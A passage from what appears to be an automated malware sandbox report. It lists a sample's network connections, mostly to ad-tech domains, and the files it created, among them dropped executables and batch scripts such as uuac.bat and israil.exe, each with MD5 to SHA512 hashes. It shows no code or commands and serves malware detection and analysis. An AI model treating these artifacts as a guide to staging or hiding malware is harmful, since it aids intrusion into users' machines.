US 8.8.8.8:53 eb2.3lift.com udp
US 8.8.8.8:53 ads.pubmatic.com udp
US 8.8.8.8:53 contextual.media.net udp
US 76.223.111.18:443 eb2.3lift.com tcp
NL 104.85.0.200:443 ads.pubmatic.com tcp
NL 104.85.0.23:443 contextual.media.net tcp
US 8.8.8.8:53 200.0.85.104.in-addr.arpa udp
US 8.8.8.8:53 130.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 23.0.85.104.in-addr.arpa udp
US 76.223.111.18:443 eb2.3lift.com tcp
US 8.8.8.8:53 image6.pubmatic.com udp
GB 185.64.190.78:443 image6.pubmatic.com tcp
US 8.8.8.8:53 sync.mathtag.com udp
US 8.8.8.8:53 dis.criteo.com udp
CH 185.29.132.241:443 sync.mathtag.com tcp
NL 178.250.1.9:443 dis.criteo.com tcp
US 8.8.8.8:53 aax-eu.amazon-adsystem.com udp
IE 52.95.126.160:443 aax-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 cms.quantserve.com udp
US 8.8.8.8:53 cm.g.doubleclick.net udp
US 8.8.8.8:53 cr.frontend.weborama.fr udp
US 8.8.8.8:53 sync.crwdcntrl.net udp
US 8.8.8.8:53 um.simpli.fi udp
US 8.8.8.8:53 a.audrte.com udp
US 8.8.8.8:53 c1.adform.net udp
US 8.8.8.8:53 match.adsrvr.org udp
US 8.8.8.8:53 ups.analytics.yahoo.com udp
US 8.8.8.8:53 simage2.pubmatic.com udp
NL 142.250.179.194:443 cm.g.doubleclick.net tcp
NL 142.250.179.194:443 cm.g.doubleclick.net tcp
NL 142.250.179.194:443 cm.g.doubleclick.net tcp
IE 54.74.78.236:443 a.audrte.com tcp
US 52.223.40.198:443 match.adsrvr.org tcp
NL 35.204.74.118:443 um.simpli.fi tcp
IE 52.48.43.143:443 sync.crwdcntrl.net tcp
NL 198.47.127.205:443 simage2.pubmatic.com tcp
US 34.111.129.221:443 cr.frontend.weborama.fr tcp
DK 37.157.2.230:443 c1.adform.net tcp
DE 3.75.62.37:443 ups.analytics.yahoo.com tcp
DE 91.228.74.166:443 cms.quantserve.com tcp
US 8.8.8.8:53 18.111.223.76.in-addr.arpa udp
US 8.8.8.8:53 78.190.64.185.in-addr.arpa udp
US 8.8.8.8:53 9.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 241.132.29.185.in-addr.arpa udp
US 8.8.8.8:53 160.126.95.52.in-addr.arpa udp
US 8.8.8.8:53 image2.pubmatic.com udp
US 34.111.129.221:443 cr.frontend.weborama.fr udp
NL 142.250.179.194:443 cm.g.doubleclick.net udp
US 8.8.8.8:53 194.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 198.40.223.52.in-addr.arpa udp
US 8.8.8.8:53 205.127.47.198.in-addr.arpa udp
US 8.8.8.8:53 221.129.111.34.in-addr.arpa udp
US 8.8.8.8:53 118.74.204.35.in-addr.arpa udp
US 8.8.8.8:53 37.62.75.3.in-addr.arpa udp
US 8.8.8.8:53 236.78.74.54.in-addr.arpa udp
US 8.8.8.8:53 230.2.157.37.in-addr.arpa udp
US 8.8.8.8:53 166.74.228.91.in-addr.arpa udp
US 8.8.8.8:53 143.43.48.52.in-addr.arpa udp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
US 8.8.8.8:53 dmp.adform.net udp
US 8.8.8.8:53 simage4.pubmatic.com udp
GB 185.64.190.81:443 simage4.pubmatic.com tcp
US 8.8.8.8:53 81.190.64.185.in-addr.arpa udp
NL 142.251.36.10:443 translate-pa.googleapis.com udp
US 8.8.8.8:53 dsp.adfarm1.adition.com udp
US 8.8.8.8:53 ib.adnxs.com udp
US 8.8.8.8:53 t.adx.opera.com udp
US 8.8.8.8:53 sync.srv.stackadapt.com udp
US 8.8.8.8:53 match.prod.bidr.io udp
US 8.8.8.8:53 uipglob.semasio.net udp
US 8.8.8.8:53 pr-bh.ybp.yahoo.com udp
US 8.8.8.8:53 pixel.onaudience.com udp
US 8.8.8.8:53 mwzeom.zeotap.com udp
US 8.8.8.8:53 pubmatic-match.dotomi.com udp
US 8.8.8.8:53 x.bidswitch.net udp
US 8.8.8.8:53 ad.turn.com udp
US 8.8.8.8:53 pixel-sync.sitescout.com udp
DE 85.114.159.118:443 dsp.adfarm1.adition.com tcp
FR 141.94.170.77:443 pixel.onaudience.com tcp
IE 176.34.91.195:443 pr-bh.ybp.yahoo.com tcp
DE 18.159.23.195:443 x.bidswitch.net tcp
DE 37.252.171.53:443 ib.adnxs.com tcp
NL 82.145.213.8:443 t.adx.opera.com tcp
NL 98.98.134.242:443 pixel-sync.sitescout.com tcp
US 52.7.163.13:443 sync.srv.stackadapt.com tcp
DK 77.243.51.122:443 uipglob.semasio.net tcp
NL 63.215.202.140:443 pubmatic-match.dotomi.com tcp
US 172.67.13.182:443 mwzeom.zeotap.com tcp
IE 52.210.8.58:443 match.prod.bidr.io tcp
US 8.8.8.8:53 pool.admedo.com udp
US 8.8.8.8:53 tags.bluekai.com udp
NL 104.99.233.6:443 tags.bluekai.com tcp
BE 35.210.53.219:443 pool.admedo.com tcp
US 8.8.8.8:53 rtb-csync.smartadserver.com udp
BE 35.210.53.219:443 pool.admedo.com udp
FR 185.86.139.103:443 rtb-csync.smartadserver.com tcp
US 8.8.8.8:53 8.213.145.82.in-addr.arpa udp
US 8.8.8.8:53 242.134.98.98.in-addr.arpa udp
US 8.8.8.8:53 118.159.114.85.in-addr.arpa udp
US 8.8.8.8:53 77.170.94.141.in-addr.arpa udp
US 8.8.8.8:53 53.171.252.37.in-addr.arpa udp
US 8.8.8.8:53 140.202.215.63.in-addr.arpa udp
US 8.8.8.8:53 182.13.67.172.in-addr.arpa udp
US 8.8.8.8:53 195.23.159.18.in-addr.arpa udp
US 8.8.8.8:53 195.91.34.176.in-addr.arpa udp
US 8.8.8.8:53 122.51.243.77.in-addr.arpa udp
US 8.8.8.8:53 58.8.210.52.in-addr.arpa udp
US 8.8.8.8:53 13.163.7.52.in-addr.arpa udp
US 8.8.8.8:53 6.233.99.104.in-addr.arpa udp
US 8.8.8.8:53 219.53.210.35.in-addr.arpa udp
US 8.8.8.8:53 103.139.86.185.in-addr.arpa udp
US 8.8.8.8:53 bh.contextweb.com udp
US 208.93.169.131:443 bh.contextweb.com tcp
US 8.8.8.8:53 131.169.93.208.in-addr.arpa udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 192.178.48.227:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 227.48.178.192.in-addr.arpa udp
US 8.8.8.8:53 cm.adgrx.com udp
NL 63.251.232.165:443 cm.adgrx.com tcp
US 8.8.8.8:53 sync-tm.everesttech.net udp
US 151.101.2.49:443 sync-tm.everesttech.net tcp
US 8.8.8.8:53 csync.loopme.me udp
NL 35.214.156.26:443 csync.loopme.me tcp
US 8.8.8.8:53 b1sync.zemanta.com udp
US 8.8.8.8:53 165.232.251.63.in-addr.arpa udp
US 8.8.8.8:53 49.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 b1sync.zemanta.com tcp
US 8.8.8.8:53 d5p.de17a.com udp
SE 213.155.156.181:443 d5p.de17a.com tcp
NL 35.214.156.26:443 csync.loopme.me tcp
US 64.202.112.159:443 b1sync.zemanta.com tcp
US 8.8.8.8:53 p.rfihub.com udp
NL 193.0.160.130:443 p.rfihub.com tcp
US 8.8.8.8:53 ipac.ctnsnet.com udp
US 35.186.193.173:443 ipac.ctnsnet.com tcp
US 8.8.8.8:53 159.112.202.64.in-addr.arpa udp
US 8.8.8.8:53 130.160.0.193.in-addr.arpa udp
US 8.8.8.8:53 181.156.155.213.in-addr.arpa udp
US 8.8.8.8:53 core.iprom.net udp
SI 195.5.165.20:443 core.iprom.net tcp
US 8.8.8.8:53 ad.mrtnsvr.com udp
US 34.102.163.6:443 ad.mrtnsvr.com tcp
US 34.102.163.6:443 ad.mrtnsvr.com tcp
US 8.8.8.8:53 match.adsby.bidtheatre.com udp
NL 134.122.57.34:443 match.adsby.bidtheatre.com tcp
US 8.8.8.8:53 173.193.186.35.in-addr.arpa udp
US 8.8.8.8:53 20.165.5.195.in-addr.arpa udp
US 8.8.8.8:53 6.163.102.34.in-addr.arpa udp
US 8.8.8.8:53 34.57.122.134.in-addr.arpa udp
US 8.8.8.8:53 a.tribalfusion.com udp
US 8.8.8.8:53 cm-supply-web.gammaplatform.com udp
US 104.18.24.173:443 a.tribalfusion.com tcp
SG 35.186.154.107:443 cm-supply-web.gammaplatform.com tcp
US 8.8.8.8:53 green.erne.co udp
FR 141.95.171.141:443 green.erne.co tcp
SG 35.186.154.107:443 cm-supply-web.gammaplatform.com tcp
US 8.8.8.8:53 matching.truffle.bid udp
US 8.8.8.8:53 s.tribalfusion.com udp
US 8.8.8.8:53 pixel-eu.onaudience.com udp
FR 146.59.148.16:443 pixel-eu.onaudience.com tcp
DE 162.55.120.196:443 matching.truffle.bid tcp
US 8.8.8.8:53 173.24.18.104.in-addr.arpa udp
US 8.8.8.8:53 141.171.95.141.in-addr.arpa udp
US 8.8.8.8:53 sync.1rx.io udp
US 46.228.174.117:443 sync.1rx.io tcp
US 8.8.8.8:53 ads.playground.xyz udp
US 34.102.253.54:443 ads.playground.xyz tcp
US 8.8.8.8:53 ad.turn.com udp
NL 46.228.164.11:443 ad.turn.com tcp
US 8.8.8.8:53 16.148.59.146.in-addr.arpa udp
US 8.8.8.8:53 117.174.228.46.in-addr.arpa udp
US 8.8.8.8:53 196.120.55.162.in-addr.arpa udp
US 8.8.8.8:53 54.253.102.34.in-addr.arpa udp
US 8.8.8.8:53 11.164.228.46.in-addr.arpa udp
US 8.8.8.8:53 sync.targeting.unrulymedia.com udp
US 46.228.174.117:443 sync.targeting.unrulymedia.com tcp
NL 142.251.36.46:443 clients2.google.com udp
NL 142.251.36.46:443 clients2.google.com tcp
US 192.178.48.227:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 g.ezoic.net udp
DE 3.69.213.60:443 g.ezoic.net tcp
US 8.8.8.8:53 60.213.69.3.in-addr.arpa udp
US 216.239.32.181:443 analytics.google.com udp
NL 142.251.36.10:443 translate-pa.googleapis.com udp

Files

memory/3232-0-0x0000000000F40000-0x0000000000F56000-memory.dmp

memory/3232-1-0x0000000074D20000-0x00000000754D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\942b40ad-7020-471a-9c95-e0a7b8aef8c5.bat

MD5 d0cec99ca3a717c587689ebf399662c4
SHA1 1d4bbaf8079912ada46a6fa8693d8c20d5ec5b66
SHA256 b1ae110ef84ecec90a75742ca29adc0704b67abe8f093aa5a959ea0864766228
SHA512 99b21193db6615a33eb738c246229e9a7efcaf03fcab24654d67680396155a0c62cbc834078687d75d1892b1708383eafeda4f87e86b33bd827b18bc988122f7

memory/220-4-0x0000000002B20000-0x0000000002B56000-memory.dmp

memory/220-5-0x0000000074D20000-0x00000000754D0000-memory.dmp

memory/220-6-0x0000000002B70000-0x0000000002B80000-memory.dmp

memory/220-8-0x0000000002B70000-0x0000000002B80000-memory.dmp

memory/220-7-0x00000000052B0000-0x00000000058D8000-memory.dmp

memory/220-9-0x0000000005240000-0x0000000005262000-memory.dmp

memory/220-10-0x0000000005A10000-0x0000000005A76000-memory.dmp

memory/220-16-0x0000000005A80000-0x0000000005AE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5antmtjl.d22.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/220-21-0x0000000005C10000-0x0000000005F64000-memory.dmp

memory/220-22-0x00000000060F0000-0x000000000610E000-memory.dmp

memory/220-23-0x0000000006150000-0x000000000619C000-memory.dmp

memory/220-24-0x0000000002B70000-0x0000000002B80000-memory.dmp

memory/220-25-0x0000000007760000-0x0000000007DDA000-memory.dmp

memory/220-26-0x00000000065F0000-0x000000000660A000-memory.dmp

memory/220-30-0x0000000074D20000-0x00000000754D0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

memory/1532-32-0x0000000074D20000-0x00000000754D0000-memory.dmp

memory/1532-33-0x0000000002100000-0x0000000002110000-memory.dmp

memory/1532-34-0x0000000002100000-0x0000000002110000-memory.dmp

memory/1532-35-0x00000000054C0000-0x0000000005814000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3405ff36f29b05877758180e73940f5b
SHA1 5a590058c7822e4d1bea082aee199bd564d6d777
SHA256 8f13e2b5c71fcc3597fa264f00d6cbe3667ead598a635cb9bd52ae0e3c7bd1d7
SHA512 7b17ee01853e08a16bfc566bd555554422d4f3db045f337679f9f188f57d32c49aef9bf9b314d8f61e8bc552afb917dbad84cc9d7e33c5b74a1c541ae0f34d91

memory/1532-46-0x0000000002100000-0x0000000002110000-memory.dmp

memory/1532-49-0x0000000074D20000-0x00000000754D0000-memory.dmp

memory/3392-50-0x0000000074D20000-0x00000000754D0000-memory.dmp

memory/3392-51-0x00000000046B0000-0x00000000046C0000-memory.dmp

memory/3392-52-0x00000000046B0000-0x00000000046C0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7225eafbfbbd40118f48cede813b9930
SHA1 d2f987160f63eab7b4d7f92980e9398557fa848e
SHA256 f8786c60c21f65600d3feb51febce6056bc22ce8d18ed1076629bc1dd99df2d1
SHA512 0698ea1816a7678b8951f1586f59e8e1769a406cd68a4f1fb81c5720c017c0fc8263e458c5d6af16f7b76ade2b1b253f9fa92ada0da5e0b2e7c8aa5e10ce34e3

memory/3392-63-0x00000000046B0000-0x00000000046C0000-memory.dmp

memory/3392-66-0x0000000074D20000-0x00000000754D0000-memory.dmp

memory/2492-67-0x0000000074D20000-0x00000000754D0000-memory.dmp

memory/3232-68-0x0000000074D20000-0x00000000754D0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a7989eadba254a1e309ba2cace743e00
SHA1 4e258b176a7528e3b6980773c9d3fbfd7709af10
SHA256 30eb4796b6f42186eac4b60610ac582f5cc091142f04d5d3952853a057e828a7
SHA512 7e32d745843f4b57d941d1443c2adcad0f69c7546c6801e8f69257b17cbf3d7d15daa49a46a02204c53803d70ffd30650453c5aa3027b7c878384caa697a3998

memory/2492-79-0x0000000002A30000-0x0000000002A40000-memory.dmp

memory/2492-82-0x0000000074D20000-0x00000000754D0000-memory.dmp

memory/1256-83-0x0000000074D20000-0x00000000754D0000-memory.dmp

memory/1256-85-0x00000000049B0000-0x00000000049C0000-memory.dmp

memory/1256-84-0x00000000049B0000-0x00000000049C0000-memory.dmp

memory/1256-95-0x0000000005B10000-0x0000000005E64000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 43c933f41a0beef410c2d4a461cec4d4
SHA1 e0ac3318b81f6a62e9c7802b31d15869d17ea5c8
SHA256 7fc19a8111cadc04ae1aa05e226718a2a7076c3f2672880ba44ed7e82d224d48
SHA512 6c8d8010fd94eeac402405c9ea6f538a3f826baaf8d862c83164506943ae2f5d5781a88ac549c7dcdadfb586162043a2fe2bfebe73ddf19f2924dd306ead2b82

memory/1256-99-0x0000000074D20000-0x00000000754D0000-memory.dmp

memory/4752-100-0x0000000074D20000-0x00000000754D0000-memory.dmp

memory/4752-101-0x0000000005320000-0x0000000005330000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7444c7d90962b7b52454157e34048562
SHA1 a3f212784eb575e98ea334d833652c65293e4f82
SHA256 5b16341f32c686a7e817e1340a447f12ca6690fabbe1dacc6b9d8ad15d6f11c1
SHA512 dfdc412862d4ba33a163781eab76bc4a9cc4ac2c46cab88b2169be8512ff2216c246ca380e80d65a11f88984a20c78eec065df89ed38e42dfd1a1845e186c0f4

memory/4752-112-0x0000000005320000-0x0000000005330000-memory.dmp

memory/4752-115-0x0000000074D20000-0x00000000754D0000-memory.dmp

memory/2680-116-0x0000000074D20000-0x00000000754D0000-memory.dmp

memory/2680-117-0x0000000002930000-0x0000000002940000-memory.dmp

memory/2680-118-0x0000000002930000-0x0000000002940000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9b53571708689cf7795290a5c97f9a7e
SHA1 0e1d69acb7b4f33e832ce3b2f311d77fba7728dd
SHA256 dc81dafc712dc7ed8bee85507664e14a699d36c2336a320c3ef15e01f413a379
SHA512 71f72c9e76de12899cfe4e21de20bb8122a316ab6cb3ede8f54c730306c980773f1c6865ef23957c75e2ef204b56054c8a579d69dc3d9a08a862883f7394dad3

memory/2680-129-0x0000000002930000-0x0000000002940000-memory.dmp

memory/2680-132-0x0000000074D20000-0x00000000754D0000-memory.dmp

C:\Users\Public\Music\RunNihaiersion.exe

MD5 123bdf05b4b261644ff4579b8bd78806
SHA1 d6ce6069ba2faed71c5626daf8094a7ac921848b
SHA256 9736150b75ca7c0c89b7e0530a98c640b3ee8863b0b39a56a1d8ff9b114de631
SHA512 e734bd6455e83144ee78d9fe393fb85f968e960a5908a22bd1d884478ca79c5cbef6d0ea010d6dd575920e6931ad0be8ea02af5da46668b7287f00e75afd93b5

memory/1356-136-0x0000000000EB0000-0x0000000000EB8000-memory.dmp

C:\Users\Public\Music\RunNihaiersion.exe

MD5 123bdf05b4b261644ff4579b8bd78806
SHA1 d6ce6069ba2faed71c5626daf8094a7ac921848b
SHA256 9736150b75ca7c0c89b7e0530a98c640b3ee8863b0b39a56a1d8ff9b114de631
SHA512 e734bd6455e83144ee78d9fe393fb85f968e960a5908a22bd1d884478ca79c5cbef6d0ea010d6dd575920e6931ad0be8ea02af5da46668b7287f00e75afd93b5

memory/1356-137-0x0000000074D20000-0x00000000754D0000-memory.dmp

C:\Users\Public\Music\bes.bat

MD5 9947ba16f06abcff429e922c49790337
SHA1 bd24d00f50e0d63892fc641a1438551d577b6e50
SHA256 8683fbcb2068bf7759e1b221e2dc660757e96e2a23ac9404a541ba82fb9c4a4f
SHA512 2a8ace440d7ab8a3ae6f02a84b5f7c81872d09946752ec02ac1a0fc64d9e1cfcb891c935f11394e395c748fb5b0f8a320f71dac25fa0c19a8a87e688af49cd11

memory/1356-140-0x0000000074D20000-0x00000000754D0000-memory.dmp

C:\Users\Public\Music\israil.exe

MD5 b65cd9956dfe1877c72ffe687fc632b4
SHA1 86c1bc804f2394bb0b20fa7434257786eb72e5bf
SHA256 561d189fb1c2b89e27f0e4be57c4b16dbced1d1940712fed04adfc35d34b05a0
SHA512 fb2f44fa8821c9d5e048b74a17cdf2bd1a545e4c9c2af7a15ad50e53766c44e50d7dd1c805f0e88e7170f8ae43895977b96e6dec766225670a8e035cd421f4fd

C:\Users\Public\Music\israil.exe

MD5 b65cd9956dfe1877c72ffe687fc632b4
SHA1 86c1bc804f2394bb0b20fa7434257786eb72e5bf
SHA256 561d189fb1c2b89e27f0e4be57c4b16dbced1d1940712fed04adfc35d34b05a0
SHA512 fb2f44fa8821c9d5e048b74a17cdf2bd1a545e4c9c2af7a15ad50e53766c44e50d7dd1c805f0e88e7170f8ae43895977b96e6dec766225670a8e035cd421f4fd

memory/5036-144-0x0000000000C50000-0x0000000000C58000-memory.dmp

memory/5036-145-0x0000000074D20000-0x00000000754D0000-memory.dmp

C:\Users\Public\Music\installer2.bat

MD5 50b98ed3895545b2b72b28966cfa2b0d
SHA1 bf98a58225c8ce199e48825624e793ee8e0ca3f8
SHA256 ac019bd8d7937f836b6039c3d0a33c8e75509fb0ab79ee41ec3171f0cb0e1591
SHA512 af1c1bb692280e89df2a92f6aedbb90d76e3017572723f1bcacd092ecfd07cb1b05ebb9eb4dc322628d0734f96c95cae0e360042162859e55af957009bf0acaa

memory/5036-148-0x0000000074D20000-0x00000000754D0000-memory.dmp

memory/1432-149-0x0000000074D20000-0x00000000754D0000-memory.dmp

memory/1432-150-0x0000000003400000-0x0000000003410000-memory.dmp

memory/1432-151-0x0000000003400000-0x0000000003410000-memory.dmp

memory/1432-157-0x0000000006170000-0x00000000064C4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b91990139cd540e2a082cc96cc7b0f3f
SHA1 34d4401ff76a418296bfe4239e40cca5127b498b
SHA256 5f7b634d235f3bf66ff8526286292d8eec80609f3000de2f5940a443f6336c9e
SHA512 165d2186ae49c0d2c41c4b12370c3692b56ab172b86d87766d15afbe635fcfc8af92d0701d36d9f38da77df3f9dab6ba19ae2ca01b79637679fb785242d4d649

memory/1432-163-0x000000007FC40000-0x000000007FC50000-memory.dmp

memory/1432-164-0x0000000007820000-0x0000000007852000-memory.dmp

memory/1432-165-0x00000000703B0000-0x00000000703FC000-memory.dmp

memory/1432-175-0x0000000006DC0000-0x0000000006DDE000-memory.dmp

memory/1432-176-0x0000000007AC0000-0x0000000007B63000-memory.dmp

memory/1432-177-0x0000000007BB0000-0x0000000007BBA000-memory.dmp

memory/1432-178-0x0000000007DE0000-0x0000000007E76000-memory.dmp

memory/1432-179-0x0000000006650000-0x0000000006661000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8e8d37d41b109d8b8543bcd05baf5ba8
SHA1 24ae9dd98e7e98e338b369b386acf0fe6ba90407
SHA256 8bbf2452142ca3b1328ebddb02ea495f662edb2af623a6b0b58a7f3696416cb6
SHA512 04720e5b20cfb2599904a08ab3fb8a14254c63d484273c2f5b228209289757e1a3d54e69ae21c15de2f5a8e79bf88fa3635109e01f8a5a551ae96329a47b2b2f

C:\Users\Public\Music\RunihaiVersion.exe

MD5 05b73b535c4337c16fc3f039c1b30dc1
SHA1 8de245727efd7aaa7fa1a3662430e823b68cec0a
SHA256 6de49dcfa3016a3a99a4cf0d60745bff75d5e34902fd91b20478673184b482de
SHA512 6bb62389c085bd29c358427abf6fae55343b923ee1382e28e4a456fab5991c28bcbea202867beb90944adc8033a7a149c2f5234e2464f2f36c07dc32fa7b04f6

C:\Users\Public\Music\RunihaiVersion.exe

MD5 05b73b535c4337c16fc3f039c1b30dc1
SHA1 8de245727efd7aaa7fa1a3662430e823b68cec0a
SHA256 6de49dcfa3016a3a99a4cf0d60745bff75d5e34902fd91b20478673184b482de
SHA512 6bb62389c085bd29c358427abf6fae55343b923ee1382e28e4a456fab5991c28bcbea202867beb90944adc8033a7a149c2f5234e2464f2f36c07dc32fa7b04f6

C:\Users\Public\Music\es.bat

MD5 b00ef4b757bc25a0f41c3d74961ff9a0
SHA1 cfdaca2c4c8f1fce33275361260b251d8d74173a
SHA256 417a75bfa635462b42c3509d826180f719593eacbe29778352461c28579ddd76
SHA512 259aef5462238ec388e469de0cbec03f057f536931680060835958a3028aef3a534a13e6f7c6ada6cea12cc520df09a1143ec79920bdd39cc0c875639ba2d93a

C:\Users\Public\Music\israil2.exe

MD5 e000e033786867fa9caa5d9d6728384a
SHA1 4313fddde6aba146cd3c3ddd42f2db36194ded10
SHA256 7c12c2663642035392b389dbdc787c42fe669085be401b3108c14fe2e44a6131
SHA512 3c091650c454267153b7b88e6093ea89cb799703eebb8d4ed5e8d25591a0a07261db712eec6b46b74b0408d8cea5103e9aabd4975d9d8fac56be6340a54d8e96

C:\Users\Public\Music\israil2.exe

MD5 e000e033786867fa9caa5d9d6728384a
SHA1 4313fddde6aba146cd3c3ddd42f2db36194ded10
SHA256 7c12c2663642035392b389dbdc787c42fe669085be401b3108c14fe2e44a6131
SHA512 3c091650c454267153b7b88e6093ea89cb799703eebb8d4ed5e8d25591a0a07261db712eec6b46b74b0408d8cea5103e9aabd4975d9d8fac56be6340a54d8e96

C:\Users\Public\Music\uuac.bat

MD5 c0c5cf18ed5b12d0cf2e77312e553328
SHA1 9f594d79de6cd8d546a6b2869029ebbd59c4b93f
SHA256 197ad34574917cff1d33ae3789fecb0120797e99e652c9746704846ef4a1cc69
SHA512 508d0692ab6e648b0d6de9c29c2b4bd85edcf1e3046533f83cdb1d4f98be6b830ea3f185ef81037afd19d13156a3d528c15339608337b62842d32af24b11ca78

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\israil2.exe.log

MD5 916851e072fbabc4796d8916c5131092
SHA1 d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA256 7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA512 07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 93c8fb0a3312c978af01c3360240c96f
SHA1 b384b9b28661973d923d49e5dfc7b688d44cdbd8
SHA256 766a8bc7ee7567989567376c876e5296af4f4794cc09dc9d9230aa8ffdd4b722
SHA512 1ff214c62546b693e1ccb1174a2c8be88a9d30df1007f9be1a73d043b6fd6e2bc845da912b15027e9740e2358ff4b30489f6c770cd7e353761799b6ba7ae7220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 93c8fb0a3312c978af01c3360240c96f
SHA1 b384b9b28661973d923d49e5dfc7b688d44cdbd8
SHA256 766a8bc7ee7567989567376c876e5296af4f4794cc09dc9d9230aa8ffdd4b722
SHA512 1ff214c62546b693e1ccb1174a2c8be88a9d30df1007f9be1a73d043b6fd6e2bc845da912b15027e9740e2358ff4b30489f6c770cd7e353761799b6ba7ae7220

C:\Users\Admin\AppData\Local\Temp\xx.exe

MD5 d3e4bf5f503e63ca9f51a3c19c842b0d
SHA1 7f6fd78fbec8b65744a0cb8ad8e992ed383f0df4
SHA256 5372854f4e74839bd6fbb780f40180921bbbb648d863534c36b029a44c90b549
SHA512 27c1a8d9959a27d6fbc370dfb677eb9e022417b8a0b8adc103713269a961d6c8eb8782299b745d53ba0b7c4291bf53b3951d5959831df328f2a59effc3fac10f

C:\Users\Admin\AppData\Local\Temp\xx.exe

MD5 d3e4bf5f503e63ca9f51a3c19c842b0d
SHA1 7f6fd78fbec8b65744a0cb8ad8e992ed383f0df4
SHA256 5372854f4e74839bd6fbb780f40180921bbbb648d863534c36b029a44c90b549
SHA512 27c1a8d9959a27d6fbc370dfb677eb9e022417b8a0b8adc103713269a961d6c8eb8782299b745d53ba0b7c4291bf53b3951d5959831df328f2a59effc3fac10f

C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe

MD5 e026996a95122a919a1ee58b66d9d18c
SHA1 ed4db7e91d93155484545bf071026c8333fb4f87
SHA256 b5a7a0c9af69d911753b0afdc3859f9f7509749520a308ba4e1e5b547e2c4c9c
SHA512 6cf718e19b3eea23bf56d2720d8972017c9b65f5f102a9e78c4aad89eed64ba2377a56ab28341716120169d750db0855c207c986eb1893c0e4cb7294dae75871

C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe

MD5 e026996a95122a919a1ee58b66d9d18c
SHA1 ed4db7e91d93155484545bf071026c8333fb4f87
SHA256 b5a7a0c9af69d911753b0afdc3859f9f7509749520a308ba4e1e5b547e2c4c9c
SHA512 6cf718e19b3eea23bf56d2720d8972017c9b65f5f102a9e78c4aad89eed64ba2377a56ab28341716120169d750db0855c207c986eb1893c0e4cb7294dae75871

C:\Users\Admin\AppData\Local\Temp\AkW22FbGMd.exe

MD5 382a46ef7bc798b728ed963d542d61d7
SHA1 4af1e5c9d85716555f95d4f88ec5db4d6205b611
SHA256 f63f83f9ac97bdb155e01b72c8bf38797971ad087d1eb54e6019d10ce901fcc7
SHA512 5063fe51a2b048290a7b92f785b1197df981a95b84e3d04610e7dcf5767318f527598fd62c4b89e4da90b7c47ed1c7544b9862bd292123c79f43db9b4dff57f9

C:\Users\Admin\AppData\Local\Temp\AkW22FbGMd.exe

MD5 382a46ef7bc798b728ed963d542d61d7
SHA1 4af1e5c9d85716555f95d4f88ec5db4d6205b611
SHA256 f63f83f9ac97bdb155e01b72c8bf38797971ad087d1eb54e6019d10ce901fcc7
SHA512 5063fe51a2b048290a7b92f785b1197df981a95b84e3d04610e7dcf5767318f527598fd62c4b89e4da90b7c47ed1c7544b9862bd292123c79f43db9b4dff57f9

C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe

MD5 2a9c1b05b7c875f6c0f2c43e7abcc381
SHA1 623f806907f075368e454ba79f1812007a749c47
SHA256 1a16f37765daa60e33fce4570fcc20698d63c058a646956e2e31ddb42f8616e5
SHA512 479218de83e5dbbd8e17762dc2cb307e80c0f82d87ea3a9778a8da3936c727529d4238fab8e1ec301a2ce2afb70d3c90e3d3f117cd48fa165254b2feb658a808

C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe

MD5 2a9c1b05b7c875f6c0f2c43e7abcc381
SHA1 623f806907f075368e454ba79f1812007a749c47
